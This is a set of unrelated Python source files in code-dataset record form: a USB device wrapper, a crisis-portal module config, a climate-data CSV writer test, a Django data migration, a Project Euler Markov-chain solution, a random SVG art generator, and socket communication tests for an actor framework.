self._read()\n self.rdofs = 0\n if len(self.rdbuf) > 0:\n break\n else:\n # no data received\n attempts -= 1\n if attempts > 0:\n # try again\n continue\n # return what we have\n return data\n # copy the read buffer into the returned data\n n = len(self.rdbuf)\n if n >= bytes_to_rd:\n # copy a partial read buffer\n data += self.rdbuf[:bytes_to_rd]\n self.rdofs = bytes_to_rd\n return data\n else:\n # copy all of the read buffer\n data += self.rdbuf\n bytes_to_rd -= n\n # read more data...\n except usb.core.USBError as e:\n raise usbdev_error(str(e))\n # never reached\n raise usbdev_error(\"internal error\")\n\n # private functions\n\n def _wrap_api(self):\n \"\"\"set _read/_write to match the USB api version\"\"\"\n import inspect\n args, varargs, varkw, defaults = inspect.getargspec(usb.core.Device.read)\n if (len(args) > 2) and (args[3] == 'interface'):\n usb_api = 1 # Require \"interface\" parameter\n else :\n usb_api = 2\n for m in ('write', 'read'):\n setattr(self, '_%s' % m, getattr(self, '_%s_v%d' % (m, usb_api)))\n\n def _set_interface(self, cfg, itf):\n \"\"\"select the interface to use\"\"\"\n self.interface = None\n for i in range(cfg.bNumInterfaces):\n x = cfg[(i,0)]\n if x.bInterfaceNumber == itf:\n self.interface = x\n endpoints = sorted([ep.bEndpointAddress for ep in self.interface])\n self.ep_out, self.ep_in = endpoints[:2]\n\n def _write_v1(self, data):\n \"\"\"Write using the deprecated API\"\"\"\n return self.usb_dev.write(self.ep_out, data, self.interface, self.usb_wr_timeout)\n\n def _read_v1(self):\n \"\"\"Read using the deprecated API\"\"\"\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.interface, self.usb_rd_timeout)\n\n def _write_v2(self, data):\n \"\"\"Write using the API introduced with pyusb 1.0.0b2\"\"\"\n return self.usb_dev.write(self.ep_out, data, self.usb_wr_timeout)\n\n def _read_v2(self):\n \"\"\"Read using the API introduced with pyusb 1.0.0b2\"\"\"\n return self.usb_dev.read(self.ep_in, self.rdbuf_chunksize, self.usb_rd_timeout)\n\n#------------------------------------------------------------------------------\n\n","sub_path":"usbdev.py","file_name":"usbdev.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
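# A hypothetical usage sketch for the usbdev class above. The (vid, pid) pair is
# made up for illustration; find() expects a list of such pairs and returns either
# ((vid, pid, sn), None) or (None, an error message), as the record's code shows.

device, err = find([(0x0403, 0x6010)])
if err is None:
    vid, pid, sn = device
    dev = usbdev()
    dev.open(vid, pid, itf=0, sn=sn)
    dev.write_data(b"\x01\x02")            # chunked bulk write via ep_out
    reply = dev.read_data(64, attempts=3)  # buffered bulk read via ep_in
    dev.close()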
+{"seq_id":"55685524","text":"# -*- coding: utf-8 -*-\n\nfrom gluon import current\nfrom gluon.storage import Storage\nfrom gluon.contrib.simplejson.ordered_dict import OrderedDict\nsettings = current.deployment_settings\nT = current.T\n\n\"\"\"\n Template settings for Crisis Portal\n\n All settings which are to configure a specific template are located here\n\n Deployers should ideally not need to edit any other files outside of their template folder\n\"\"\"\n\n# Pre-Populate\nsettings.base.prepopulate = [\"Crisis\"]\n\n# -----------------------------------------------------------------------------\n# Finance settings\nsettings.fin.currencies = {\n \"AUD\" : T(\"Australian Dollars\"),\n \"CAD\" : T(\"Canadian Dollars\"),\n \"EUR\" : T(\"Euros\"),\n \"GBP\" : T(\"Great British Pounds\"),\n \"CHF\" : T(\"Swiss Francs\"),\n \"USD\" : T(\"United States Dollars\"),\n}\n\n# Comment/uncomment modules here to disable/enable them\nsettings.modules = OrderedDict([\n # Core modules which shouldn't be disabled\n (\"default\", Storage(\n name_nice = T(\"Home\"),\n restricted = False, # Use ACLs to control access to this module\n access = None, # All Users (inc Anonymous) can see this module in the default menu & access the controller\n module_type = None # This item is not shown in the menu\n )),\n (\"admin\", Storage(\n name_nice = T(\"Administration\"),\n #description = \"Site Administration\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu & access the controller\n module_type = None # This item is handled separately for the menu\n )),\n (\"appadmin\", Storage(\n name_nice = T(\"Administration\"),\n #description = \"Site Administration\",\n restricted = True,\n module_type = None # No Menu\n )),\n (\"errors\", Storage(\n name_nice = T(\"Ticket Viewer\"),\n #description = \"Needed for Breadcrumbs\",\n restricted = False,\n module_type = None # No Menu\n )),\n (\"sync\", Storage(\n name_nice = T(\"Synchronization\"),\n #description = \"Synchronization\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu & access the controller\n module_type = None # This item is handled separately for the menu\n )),\n # Uncomment to enable internal support requests\n #(\"support\", Storage(\n # name_nice = T(\"Support\"),\n # #description = \"Support Requests\",\n # restricted = True,\n # module_type = None # This item is handled separately for the menu\n # )),\n (\"gis\", Storage(\n name_nice = T(\"Map\"),\n #description = \"Situation Awareness & Geospatial Analysis\",\n restricted = True,\n module_type = 6, # 6th item in the menu\n )),\n (\"pr\", Storage(\n name_nice = T(\"Person Registry\"),\n #description = \"Central point to record details on People\",\n restricted = True,\n access = \"|1|\", # Only Administrators can see this module in the default menu (access to controller is possible to all still)\n module_type = 10\n )),\n (\"org\", Storage(\n name_nice = T(\"Organizations\"),\n #description = 'Lists \"who is doing what & where\". 
Allows relief agencies to coordinate their activities',\n restricted = True,\n module_type = 1\n )),\n # All modules below here should be possible to disable safely\n (\"hrm\", Storage(\n name_nice = T(\"Staff\"),\n #description = \"Human Resources Management\",\n restricted = True,\n module_type = 2,\n )),\n (\"vol\", Storage(\n name_nice = T(\"Volunteers\"),\n #description = \"Human Resources Management\",\n restricted = True,\n module_type = 2,\n )),\n (\"cms\", Storage(\n name_nice = T(\"Content Management\"),\n #description = \"Content Management System\",\n restricted = True,\n module_type = 10,\n )),\n (\"doc\", Storage(\n name_nice = T(\"Documents\"),\n #description = \"A library of digital resources, such as photos, documents and reports\",\n restricted = True,\n module_type = 10,\n )),\n (\"msg\", Storage(\n name_nice = T(\"Messaging\"),\n #description = \"Sends & Receives Alerts via Email & SMS\",\n restricted = True,\n # The user-visible functionality of this module isn't normally required. Rather it's main purpose is to be accessed from other modules.\n module_type = None,\n )),\n (\"supply\", Storage(\n name_nice = T(\"Supply Chain Management\"),\n #description = \"Used within Inventory Management, Request Management and Asset Management\",\n restricted = True,\n module_type = None, # Not displayed\n )),\n (\"inv\", Storage(\n name_nice = T(\"Warehouse\"),\n #description = \"Receiving and Sending Items\",\n restricted = True,\n module_type = 4\n )),\n #(\"proc\", Storage(\n # name_nice = T(\"Procurement\"),\n # #description = \"Ordering & Purchasing of Goods & Services\",\n # restricted = True,\n # module_type = 10\n # )),\n (\"asset\", Storage(\n name_nice = T(\"Assets\"),\n #description = \"Recording and Assigning Assets\",\n restricted = True,\n module_type = 5,\n )),\n # Vehicle depends on Assets\n (\"vehicle\", Storage(\n name_nice = T(\"Vehicles\"),\n #description = \"Manage Vehicles\",\n restricted = True,\n module_type = 10,\n )),\n (\"req\", Storage(\n name_nice = T(\"Requests\"),\n #description = \"Manage requests for supplies, assets, staff or other resources. 
Matches against Inventories where supplies are requested.\",\n restricted = True,\n module_type = 10,\n )),\n (\"project\", Storage(\n name_nice = T(\"Projects\"),\n #description = \"Tracking of Projects, Activities and Tasks\",\n restricted = True,\n module_type = 2\n )),\n # required for Project\n (\"stats\", Storage(\n name_nice = T(\"Statistics\"),\n #description = \"Manages statistics\",\n restricted = True,\n module_type = None,\n )),\n (\"survey\", Storage(\n name_nice = T(\"Surveys\"),\n #description = \"Create, enter, and manage surveys.\",\n restricted = True,\n module_type = 5,\n )),\n (\"cr\", Storage(\n name_nice = T(\"Shelters\"),\n #description = \"Tracks the location, capacity and breakdown of victims in Shelters\",\n restricted = True,\n module_type = 10\n )),\n (\"hms\", Storage(\n name_nice = T(\"Hospitals\"),\n #description = \"Helps to monitor status of hospitals\",\n restricted = True,\n module_type = 10\n )),\n (\"irs\", Storage(\n name_nice = T(\"Incidents\"),\n #description = \"Incident Reporting System\",\n restricted = True,\n module_type = 10\n )),\n (\"dvi\", Storage(\n name_nice = T(\"Disaster Victim Identification\"),\n #description = \"Disaster Victim Identification\",\n restricted = True,\n module_type = 10,\n #access = \"|DVI|\", # Only users with the DVI role can see this module in the default menu & access the controller\n #audit_read = True, # Can enable Audit for just an individual module here\n #audit_write = True\n )),\n (\"mpr\", Storage(\n name_nice = T(\"Missing Person Registry\"),\n #description = \"Helps to report and search for missing persons\",\n restricted = True,\n module_type = 10,\n )),\n (\"dvr\", Storage(\n name_nice = T(\"Disaster Victim Registry\"),\n #description = \"Allow affected individuals & households to register to receive compensation and distributions\",\n restricted = True,\n module_type = 10,\n )),\n #(\"scenario\", Storage(\n # name_nice = T(\"Scenarios\"),\n # #description = \"Define Scenarios for allocation of appropriate Resources (Human, Assets & Facilities).\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"event\", Storage(\n # name_nice = T(\"Events\"),\n # #description = \"Activate Events (e.g. 
from Scenario templates) for allocation of appropriate Resources (Human, Assets & Facilities).\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"fire\", Storage(\n # name_nice = T(\"Fire Stations\"),\n # #description = \"Fire Station Management\",\n # restricted = True,\n # module_type = 1,\n # )),\n #(\"flood\", Storage(\n # name_nice = T(\"Flood Warnings\"),\n # #description = \"Flood Gauges show water levels in various parts of the country\",\n # restricted = True,\n # module_type = 10\n # )),\n #(\"member\", Storage(\n # name_nice = T(\"Members\"),\n # #description = \"Membership Management System\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"patient\", Storage(\n # name_nice = T(\"Patient Tracking\"),\n # #description = \"Tracking of Patients\",\n # restricted = True,\n # module_type = 10\n # )),\n (\"security\", Storage(\n name_nice = T(\"Security\"),\n #description = \"Security Management System\",\n restricted = True,\n module_type = 10,\n )),\n # These are specialist modules\n # Requires RPy2\n #(\"climate\", Storage(\n # name_nice = T(\"Climate\"),\n # #description = \"Climate data portal\",\n # restricted = True,\n # module_type = 10,\n #)),\n (\"delphi\", Storage(\n name_nice = T(\"Decision Maker\"),\n #description = \"Supports the decision making of large groups of Crisis Management Experts by helping the groups create ranked list.\",\n restricted = False,\n module_type = 10,\n )),\n # @ToDo: Rewrite in a modern style\n #(\"budget\", Storage(\n # name_nice = T(\"Budgeting Module\"),\n # #description = \"Allows a Budget to be drawn up\",\n # restricted = True,\n # module_type = 10\n # )),\n # @ToDo: Port these Assessments to the Survey module\n #(\"building\", Storage(\n # name_nice = T(\"Building Assessments\"),\n # #description = \"Building Safety Assessments\",\n # restricted = True,\n # module_type = 10,\n # )),\n # Deprecated by Surveys module\n # - depends on CR, IRS & Impact\n #(\"assess\", Storage(\n # name_nice = T(\"Assessments\"),\n # #description = \"Rapid Assessments & Flexible Impact Assessments\",\n # restricted = True,\n # module_type = 10,\n # )),\n #(\"impact\", Storage(\n # name_nice = T(\"Impacts\"),\n # #description = \"Used by Assess\",\n # restricted = True,\n # module_type = None,\n # )),\n #(\"ocr\", Storage(\n # name_nice = T(\"Optical Character Recognition\"),\n # #description = \"Optical Character Recognition for reading the scanned handwritten paper forms.\",\n # restricted = False,\n # module_type = 10\n # )),\n])\n","sub_path":"private/templates/Crisis/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"386808415","text":"from os import path\nimport unittest\n\nfrom ukcp_dp import InputType, PlotType\nfrom ukcp_dp.test.test_write import run_write_test\n\n\ndef get_ls6_test_bbox_data():\n data = {}\n data[InputType.AREA] = [\"bbox\", -84667.14, 0, 676489.68, 1230247.3]\n data[InputType.SPATIAL_REPRESENTATION] = \"12km\"\n data[InputType.COLLECTION] = \"land-obs\"\n data[InputType.VARIABLE] = \"tasmax\"\n\n # image options\n data[InputType.FONT_SIZE] = \"m\"\n data[InputType.IMAGE_FORMAT] = \"png\"\n data[InputType.IMAGE_SIZE] = 1200\n\n # temporal options\n data[InputType.TIME_PERIOD] = \"mam\"\n data[InputType.TEMPORAL_AVERAGE_TYPE] = \"seas\"\n data[InputType.YEAR] = 2018\n\n base_path = path.abspath(path.dirname(__file__))\n input_files = path.join(\n base_path, \"data\", \"input_files\", \"LS6_Maps_01_bbox_seasonal.nc\"\n )\n\n reference_files = [\n path.join(\n base_path, \"data\", \"expected_outputs\", \"LS6_Maps_01_bbox_seasonal.csv\"\n )\n ]\n\n output_file_index = [0]\n return data, input_files, reference_files, output_file_index\n\n\ndef get_ls6_test_region_data():\n data, _, _, _ = get_ls6_test_bbox_data()\n data[InputType.AREA] = \"river_basin|all\"\n data[InputType.SPATIAL_REPRESENTATION] = \"river_basin\"\n\n # temporal options\n data[InputType.TIME_PERIOD] = \"aug\"\n data[InputType.TEMPORAL_AVERAGE_TYPE] = \"mon\"\n\n base_path = path.abspath(path.dirname(__file__))\n input_files = path.join(\n base_path, \"data\", \"input_files\", \"LS6_Maps_01_river_monthly.nc\"\n )\n\n reference_files = [\n path.join(\n base_path, \"data\", \"expected_outputs\", \"LS6_Maps_01_river_monthly.csv\"\n )\n ]\n\n output_file_index = [0]\n return data, input_files, reference_files, output_file_index\n\n\nclass SingleMapCsvTestCase(unittest.TestCase):\n def test_single_map_csv(self):\n \"\"\"\n Test that the single map csv writer writes the correct csv values.\n \"\"\"\n inputs = [(get_ls6_test_bbox_data()), (get_ls6_test_region_data())]\n\n for data, input_files, reference_files, output_file_index in inputs:\n with self.subTest(\n data=data,\n input_files=input_files,\n reference_files=reference_files,\n output_file_index=output_file_index,\n ):\n diff = run_write_test(\n data,\n input_files,\n reference_files,\n output_file_index,\n PlotType.SINGLE_MAP,\n )\n self.assertEqual(diff, \"\", diff)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"ukcp_dp/test/test_write_csv_single_map.py","file_name":"test_write_csv_single_map.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"332922864","text":"from django.db import migrations\nfrom nalkinscloud_mosquitto.models import DeviceType, DeviceModel\n\n\ndef create_device_types(apps, schema_editor):\n device_type = DeviceType.objects.create()\n device_type_list = ['dht', 'switch', 'magnet', 'distillery', 'service', 'user',]\n for type_name in device_type_list:\n if type_name is not None:\n print('#' + type_name + '#')\n device_type.type = type_name\n device_type.save()\n\n\ndef create_device_models(apps, schema_editor):\n device_model = DeviceModel.objects.create()\n device_model_list = ['esp8266', 'service', 'application',]\n for model_name in device_model_list:\n if model_name is not None:\n print('#' + model_name + '#')\n device_model.type = model_name\n device_model.save()\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('order', '0001_initial'),\n ]\n\n operations = [\n migrations.RunPython(create_device_types),\n migrations.RunPython(create_device_models),\n ]\n","sub_path":"src/nalkinscloud_mosquitto/fixtures/tmp_0002_data_initial.py","file_name":"tmp_0002_data_initial.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"137451620","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n\nPE_0227\n\nThe Chase\n\nMarkov Chains...\n\nCreated on Mon Dec 11 18:52:38 2017\n@author: mbh\n\"\"\"\nimport time\nimport numpy as np\n\ndef p227(players):\n \n t0=time.clock()\n \n #if there are 2N players, distances between the dice-holding players will \n #vary from 0 to N.\n # We need a N+1 x N+1 transition matrix \n n=(players+2)//2 \n P=tpm(n)\n N=fundamental(P,[len(P)-1])\n t=absorbSteps(N)\n \n #We start in state s_0 (maximum distance apart) \n print(round(t[0][0],6))\n print(time.clock()-t0)\n\n#create transition matrix\ndef tpm(n):\n \n P=np.zeros([n,n])\n P[n-1][n-1]=36\n \n P[0][0]=18\n P[0][1]=16\n P[0][2]=2\n \n P[1][0]=8\n P[1][1]=19\n P[1][2]=8\n P[1][3]=1\n \n P[n-2][n-4]=1\n P[n-2][n-3]=8\n P[n-2][n-2]=19\n P[n-2][n-1]=8\n \n for i in range(2,n-2):\n P[i][i-2]=1\n P[i][i-1]=8\n P[i][i]=18\n P[i][i+1]=8\n P[i][i+2]=1\n \n #normalise P\n P/=36\n return P\n\n#The ij-entry nij of the fundamental matrix N is the expected number of times \n#the chain is in state sj, given that it starts in state si. The initial state\n# is counted if i = j \ndef fundamental(P,absorbingStates): \n \n Q=QfromP(P,absorbingStates) \n N=np.linalg.inv(np.identity(len(Q))-Q) \n return N\n\n#absorbing states is a list of absorbing states\ndef QfromP(P,absorbingStates):\n \n rows,cols=0,1\n Q=np.delete (P,absorbingStates,rows)\n Q=np.delete (Q,absorbingStates,cols) \n return Q\n\n#steps to absorbtion\ndef absorbSteps(N):\n\n #c is a column vector all of whose entries are 1\n c=np.ones([len(N),1])\n \n #Let ti be the expected number of steps before the chain is absorbed, given \n #that the chain starts in state s_i, and let t be the column vector whose \n #ith entry is t_i. Then\n t=np.dot(N,c) \n return t\n \n \n \n ","sub_path":"PE_0227/PE_0227.py","file_name":"PE_0227.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"591940254","text":"'''Archie'''\r\n\r\n# Imports\r\nimport math\r\nimport svgwrite\r\nimport random\r\n# Basics\r\ndwg = svgwrite.Drawing(filename='Archie.svg')\r\nrng = random.Random()\r\n# Parameters\r\nmin_size = 500\r\nmax_size = 5000\r\nmax_shapes = 1000\r\n\r\n\r\n# Styles\r\nclass Style:\r\n\r\n def __init__(self, name, list):\r\n self.name = name\r\n self.list = list\r\n self.rating = 25\r\n self.lowerbound = 0\r\n self.upperbound = self.lowerbound + self.rating\r\n\r\n\r\n# Tools\r\nall_shapes = Style('all shapes', ['circle', 'rectangle', 'square', 'line'])\r\nonly_circles = Style('only circles', ['circle'])\r\nonly_rects = Style('only rectangles', ['rectangle'])\r\nonly_squares = Style('only squares', ['square'])\r\nonly_lines = Style('only lines', ['line'])\r\ntool_list = [all_shapes, only_circles, only_rects, only_squares, only_lines]\r\n\r\n# Palettes\r\nrandom_colours = Style('Random Colours', 0)\r\nbasic_colours = Style('Basic Colours', ['blue', 'red', 'green', 'yellow', 'pink', 'orange', 'purple', 'white', 'black', 'grey'])\r\nblack_and_white = Style('B&W', ['#000', '#FFF'])\r\nmonochrome = Style('Monochrome', ['#000', '#111', '#222', '#333', '#444', '#555', '#666', '#777', '#888', '#999', '#aaa', '#bbb', '#ccc', '#ddd', '#eee', '#fff'])\r\np_reds = Style('Pastel Reds', ['#ff4848', '#ff7575', '#ff8a8a', '#ff9797', '#ffa8a8', '#ffbbbb', '#ffcece', '#ffdfdf', '#ffecec', '#fff2f2'])\r\np_pinks = Style('Pastel Pinks', ['#ff62b0', '#ff73b9', '#ff86c2', '#ff97cb', '#ffa8d3', '#ffbbdd', '#ffc8e3', '#ffdfef', '#ffecf5', '#fff9fc'])\r\np_blues = Style('Pastel Blues', ['#2897b7', '#2faace', '#44bdd5', '#57bcd9', '#7bcae1', '#8cd1e6', '#a5dbeb', '#b8e2ef', '#c9eaf3', '#eaf7fb'])\r\np_greens = Style('Pastel Greens', ['#4eb553', '#5cc25f', '#6ad06b', '#77dd77', '#84ea83', '#92f890', '#9fff9c'])\r\npalette_list = [random_colours, basic_colours, black_and_white, monochrome, p_reds, p_pinks, p_blues, p_greens]\r\n\r\n# Aspect Ratio\r\nrandom_aspect = Style('Random Aspect Ratio', 'rando')\r\none_by_one = Style('1x1', 1/1)\r\nfour_by_three = Style('4x3', 3/4)\r\nthree_by_four = Style('3x4', 4/3)\r\nsixteen_by_nine = Style('16x9', 9/16)\r\nnine_by_sixteen = Style('9x16', 16/9)\r\ngolden_portrait = Style('Golden Portrait', 1.609)\r\ngolden_landscape = Style('Golden Landscape', 1/1.609)\r\naspect_list = [random_aspect, one_by_one, four_by_three, three_by_four, sixteen_by_nine, nine_by_sixteen]\r\n\r\n# Size Style\r\nrandom_size = Style('Random Object Size', ['', ''])\r\nsmall = Style('Small', ['', 0.3])\r\nsmall_mid = Style('Small - Medium',['', 0.6])\r\nmid = Style('Medium', [0.4, 0.6])\r\nmid_large = Style('Medium - Large', [0.4, ''])\r\nlarge = Style('Large', [0.7, ''])\r\nsize_list = [random_size, small, small_mid, mid, large]\r\n\r\n# Padding Style\r\nno_padding = Style('No Padding', 0)\r\ntwopp = Style('2%', 0.02)\r\nfivepp = Style('5%', 0.05)\r\ntenpp = Style('10%', 0.1)\r\ntwentypp = Style('20%', 0.2)\r\nfortypp = Style('40%', 0.4)\r\nfiftyypp = Style('50%', 0.499) # 0.5 results in error - Needs to be one pixel difference\r\npadding_list = [no_padding, twopp, fivepp, tenpp, twentypp, fortypp, fiftyypp]\r\n\r\n# Number Styles\r\nmax_object_number = 500\r\nrandom_shape_number = Style('A Random Number of Shapes', [0, rng.randrange(1, max_object_number)])\r\nsuper_minimilist = Style('Super Minimal', [0,5])\r\nminimal = Style('Minimal', [0, 10])\r\nmodest = Style('Modest', [10, 30])\r\narchie1 = Style('Archie V1', [30, 80])\r\ncluttered = Style('Cluttered', [80, 200])\r\nhectic = 
Style('Hectic', [200, max_object_number])\r\nnumber_list = [random_shape_number, super_minimilist, minimal, modest, archie1, cluttered, hectic]\r\n\r\n\r\n\r\ndef Archie():\r\n # Style Functions\r\n def rater(list):\r\n sum_rating = 0\r\n for i in range(len(list)):\r\n list[i].lowerbound = sum_rating\r\n sum_rating = sum_rating + list[i].rating\r\n list[i].upperbound = sum_rating\r\n # print(list[i].name + ': ' + str(list[i].lowerbound) + ' < x < ' + str(list[i].upperbound))\r\n return sum_rating\r\n\r\n def style_picker(list):\r\n max_no = rater(list)\r\n picker = rng.randrange(0, max_no)\r\n # print(picker)\r\n for i in range(len(list)):\r\n if list[i].upperbound >= picker:\r\n # print(list[i].name)\r\n return list[i]\r\n\r\n # Style Picker\r\n tool = style_picker(tool_list)\r\n palette = random_colours # style_picker(palette_list)\r\n aspect = sixteen_by_nine\r\n size = style_picker(size_list)\r\n padding = style_picker(padding_list)\r\n clip = 0\r\n number = style_picker(number_list)\r\n print(tool.name)\r\n print(palette.name)\r\n print(aspect.name)\r\n print(size.name)\r\n print(padding.name)\r\n print(clip)\r\n print(number.name)\r\n\r\n # Shape Base Functions\r\n def height_assigner(aspect_ratio, w, min, max):\r\n if isinstance(aspect_ratio, float):\r\n height = int(w * aspect_ratio)\r\n return height\r\n else:\r\n height = rng.randrange(min, max)\r\n return height\r\n\r\n def sizer():\r\n maximum = min(width, height)\r\n if isinstance(size.list[0], float):\r\n l = int(size.list[0]*maximum)\r\n else:\r\n l = 50\r\n if isinstance(size.list[1], float):\r\n u = int(size.list[1]*maximum)\r\n else:\r\n u = int(0.9*maximum)\r\n # print(size.name + ' sized objects with max ' + str(maximum) + ' gives upper and lower bounds ' + str(l) + ', ' + str(u))\r\n s = rng.randrange(l, u)\r\n # print('Size = ' + str(s))\r\n return s\r\n\r\n def centre_picker(side):\r\n centre = rng.randrange(int(padding.list*side), int((1-padding.list)*side))\r\n # print(padding.name)\r\n # print(centre)\r\n return centre\r\n\r\n def colour_picker():\r\n if type(palette.list) == list:\r\n hexi_code = palette.list[rng.randrange(0, len(palette.list))]\r\n return hexi_code\r\n else:\r\n hexi = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f']\r\n hexi_code = ''\r\n for _ in range(6):\r\n hexi_code += hexi[rng.randrange(0, 15)]\r\n return '#' + hexi_code\r\n\r\n # Shape Creators\r\n def rand_circle():\r\n circle = dwg.circle(center=(centre_picker(width), centre_picker(height)), r=sizer()/4, fill=colour_picker())\r\n return circle\r\n\r\n def rand_rect(x=''):\r\n length = sizer()\r\n if type(x) == float:\r\n h = height_assigner(x, length, '', '')\r\n else:\r\n h = sizer()\r\n rect = dwg.rect(insert=(centre_picker(width), centre_picker(height)), size=(length, h), fill=colour_picker())\r\n return rect\r\n\r\n def rand_line():\r\n pts = [(centre_picker(width), centre_picker(height)), (centre_picker(width), centre_picker(height))]\r\n line = dwg.polyline(points=pts, stroke=colour_picker(), stroke_width=10, fill='none')\r\n return line\r\n\r\n def shape_picker():\r\n shp = tool.list[rng.randrange(0, len(tool.list))]\r\n if shp == 'circle':\r\n shape = rand_circle()\r\n elif shp == 'rectangle':\r\n shape = rand_rect()\r\n elif shp == 'square':\r\n shape = rand_rect(1.0)\r\n elif shp == 'line':\r\n shape = rand_line()\r\n else:\r\n print(\"I don't recognise\" + shp)\r\n return shape\r\n\r\n # Canvas Creator\r\n width = rng.randrange(min_size, max_size)\r\n height = height_assigner(aspect.list, 
width, min_size, max_size)\r\n # print(str(width) + ' x ' + str(height) + ' in a ' + aspect.name + ' aspect ratio')\r\n dwg.viewbox(width=width, height=height)\r\n background = dwg.rect(insert=(0, 0), size=(width, height), fill=colour_picker())\r\n dwg.add(background)\r\n\r\n # pad = dwg.rect(insert=(padding.list*width, padding.list*height), size=((1-(2*padding.list))*width, (1-(2*padding.list))*height))\r\n # dwg.add(pad)\r\n\r\n def placer():\r\n if isinstance(clip, str):\r\n print(clip)\r\n else:\r\n dwg.add(shape_picker())\r\n\r\n placer()\r\n for i in range(rng.randrange(number.list[0], number.list[1])):\r\n placer()\r\n\r\n\r\n dwg.save()\r\n\r\n\r\nArchie()\r\n","sub_path":"Archie V2 - Wallpaper.py","file_name":"Archie V2 - Wallpaper.py","file_ext":"py","file_size_in_byte":8124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"500117789","text":"# Copyright 1999-2020 Alibaba Group Holding Ltd.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport asyncio\nimport sys\nimport multiprocessing\nfrom typing import Union\n\nimport numpy as np\nimport pytest\n\nfrom mars.lib.aio import AioEvent\nfrom mars.oscar.backends.mars.communication import \\\n SocketChannel, SocketServer, UnixSocketServer, \\\n DummyChannel, DummyServer, get_client_type, \\\n SocketClient, UnixSocketClient, DummyClient\nfrom mars.utils import get_next_port\n\n\ntest_data = np.random.RandomState(0).rand(10, 10)\nport = get_next_port()\n\n\n# server_type, config, con\nparams = [\n (SocketServer, dict(host='127.0.0.1', port=port), f'127.0.0.1:{port}'),\n]\nif sys.platform != 'win32':\n params.append((UnixSocketServer, dict(process_index='0'), f'unixsocket:///0'))\nlocal_params = params.copy()\nlocal_params.append((DummyServer, dict(), 'dummy://'))\n\n\n@pytest.mark.parametrize(\n 'server_type, config, con',\n local_params\n)\n@pytest.mark.asyncio\nasync def test_comm(server_type, config, con):\n async def check_data(chan: Union[SocketChannel, DummyChannel]):\n np.testing.assert_array_equal(test_data, await chan.recv())\n await chan.send('success')\n\n config = config.copy()\n config['handle_channel'] = check_data\n\n # create server\n server = await server_type.create(config)\n await server.start()\n assert isinstance(server.info, dict)\n\n # create client\n client = await server_type.client_type.connect(con)\n assert isinstance(client.info, dict)\n assert isinstance(client.channel.info, dict)\n await client.send(test_data)\n\n assert 'success' == await client.recv()\n\n await client.close()\n assert client.closed\n\n # create client2\n async with await server_type.client_type.connect(con) as client2:\n assert not client2.closed\n assert client2.closed\n\n await server.join(.001)\n await server.stop()\n\n assert server.stopped\n\n async with await server_type.create(config) as server2:\n assert not server2.stopped\n assert server2.stopped\n\n\ndef _wrap_test(server_started_event, conf, tp):\n async def _test():\n async def check_data(chan: SocketChannel):\n np.testing.assert_array_equal(test_data, await chan.recv())\n await chan.send('success')\n\n nonlocal conf\n conf = conf.copy()\n conf['handle_channel'] = check_data\n\n # create server\n server = await tp.create(conf)\n await server.start()\n server_started_event.set()\n await server.join()\n\n asyncio.run(_test())\n\n\n@pytest.mark.parametrize(\n 'server_type, config, con',\n params\n)\n@pytest.mark.asyncio\nasync def test_multiprocess_comm(server_type, config, con):\n server_started = multiprocessing.Event()\n\n p = multiprocessing.Process(target=_wrap_test,\n args=(server_started, config, server_type))\n p.daemon = True\n p.start()\n\n await AioEvent(server_started).wait()\n\n # create client\n client = await server_type.client_type.connect(con)\n await client.channel.send(test_data)\n\n assert 'success' == await client.recv()\n\n await client.close()\n assert 
client.closed\n\n\ndef test_get_client_type():\n assert issubclass(get_client_type('127.0.0.1'), SocketClient)\n assert issubclass(get_client_type('unixsocket:///1'), UnixSocketClient)\n assert issubclass(get_client_type('dummy://'), DummyClient)\n","sub_path":"mars/oscar/backends/mars/communication/tests/test_comm.py","file_name":"test_comm.py","file_ext":"py","file_size_in_byte":3906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
